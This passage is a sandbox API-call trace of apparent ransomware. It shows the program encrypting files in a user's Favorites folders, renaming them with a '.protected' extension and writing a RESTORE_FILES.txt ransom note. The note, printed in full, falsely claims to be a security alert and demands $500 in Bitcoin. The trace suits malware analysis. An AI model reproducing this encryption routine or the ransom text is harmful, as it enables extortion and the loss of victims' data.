(lpString1="MSN.url", lpString2="Program Files") returned -1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="Program Files (x86)") returned -1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="$Recycle.bin") returned 1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="System Volume Information") returned -1 [0091.945] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.945] StrStrIW (lpFirst="MSN.url", lpSrch=".protected") returned 0x0 [0091.945] lstrcmpW (lpString1="MSN.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.945] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] StrStrW (lpFirst="MSN.url", lpSrch=".txt") returned 0x0 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] StrStrW (lpFirst="MSN.url", lpSrch=".rar") returned 0x0 [0091.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0091.949] StrStrW (lpFirst="MSN.url", lpSrch=".zip") returned 0x0 [0091.949] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.950] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.950] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.950] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.951] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.951] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.951] CloseHandle (hObject=0xd4) returned 1 [0091.951] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.protected") returned 74 [0091.951] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.protected")) returned 1 [0091.952] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Windows") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="Program Files (x86)") returned -1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="$Recycle.bin") returned 1 [0091.952] lstrcmpiW (lpString1="MSNBC News.url", lpString2="System Volume Information") returned -1 [0091.952] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.952] StrStrIW (lpFirst="MSNBC News.url", lpSrch=".protected") returned 0x0 [0091.952] lstrcmpW (lpString1="MSNBC News.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.952] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.952] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".txt") returned 0x0 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".rar") returned 0x0 [0091.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0091.954] StrStrW (lpFirst="MSNBC News.url", lpSrch=".zip") returned 0x0 [0091.954] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.954] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.954] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.955] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.955] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.956] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.956] CloseHandle (hObject=0xd4) returned 1 [0091.957] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.protected") returned 81 [0091.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.protected")) returned 1 [0091.958] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.958] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.958] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\RESTORE_FILES.txt") returned 74 [0091.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.958] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.958] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.959] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.959] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.959] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.959] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.959] CloseHandle (hObject=0xb4) returned 1 [0091.960] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Windows") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="Program Files (x86)") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="$Recycle.bin") returned 1 [0091.960] lstrcmpiW (lpString1="Windows Live", lpString2="System Volume Information") returned 1 [0091.960] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 56 [0091.960] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0091.960] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0091.960] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*") returned 58 [0091.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.961] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.961] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.961] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\.") returned 58 [0091.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.962] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\..") returned 59 [0091.962] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.962] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.962] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Windows") returned -1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files") returned -1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="Program Files (x86)") returned -1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="$Recycle.bin") returned 1 [0091.962] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="System Volume Information") returned -1 [0091.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.962] StrStrIW (lpFirst="Get Windows Live.url", lpSrch=".protected") returned 0x0 [0091.962] lstrcmpW (lpString1="Get Windows Live.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".txt") returned 0x0 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".rar") returned 0x0 [0091.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 77 [0091.963] StrStrW (lpFirst="Get Windows Live.url", lpSrch=".zip") returned 0x0 [0091.963] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.966] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.966] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.966] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.966] CloseHandle (hObject=0xd4) returned 1 [0091.967] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.protected") returned 87 [0091.967] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.protected")) returned 1 [0091.967] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Windows") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="Program Files (x86)") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$Recycle.bin") returned 1 [0091.967] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="System Volume Information") returned 1 [0091.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.968] StrStrIW (lpFirst="Windows Live Gallery.url", lpSrch=".protected") returned 0x0 [0091.968] lstrcmpW (lpString1="Windows Live Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.968] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.968] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".txt") returned 0x0 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".rar") returned 0x0 [0091.970] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 81 [0091.970] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch=".zip") returned 0x0 [0091.970] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.971] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.971] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.971] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.971] CloseHandle (hObject=0xd4) returned 1 [0091.972] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.protected") returned 91 [0091.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.protected")) returned 1 [0091.973] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Windows") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="Program Files (x86)") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$Recycle.bin") returned 1 [0091.973] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="System Volume Information") returned 1 [0091.973] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrIW (lpFirst="Windows Live Mail.url", lpSrch=".protected") returned 0x0 [0091.973] lstrcmpW (lpString1="Windows Live Mail.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.973] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.973] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.973] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".txt") returned 0x0 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.973] StrStrW (lpFirst="Windows Live Mail.url", lpSrch=".rar") returned 0x0 [0091.973] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 78 [0091.974] StrStrW 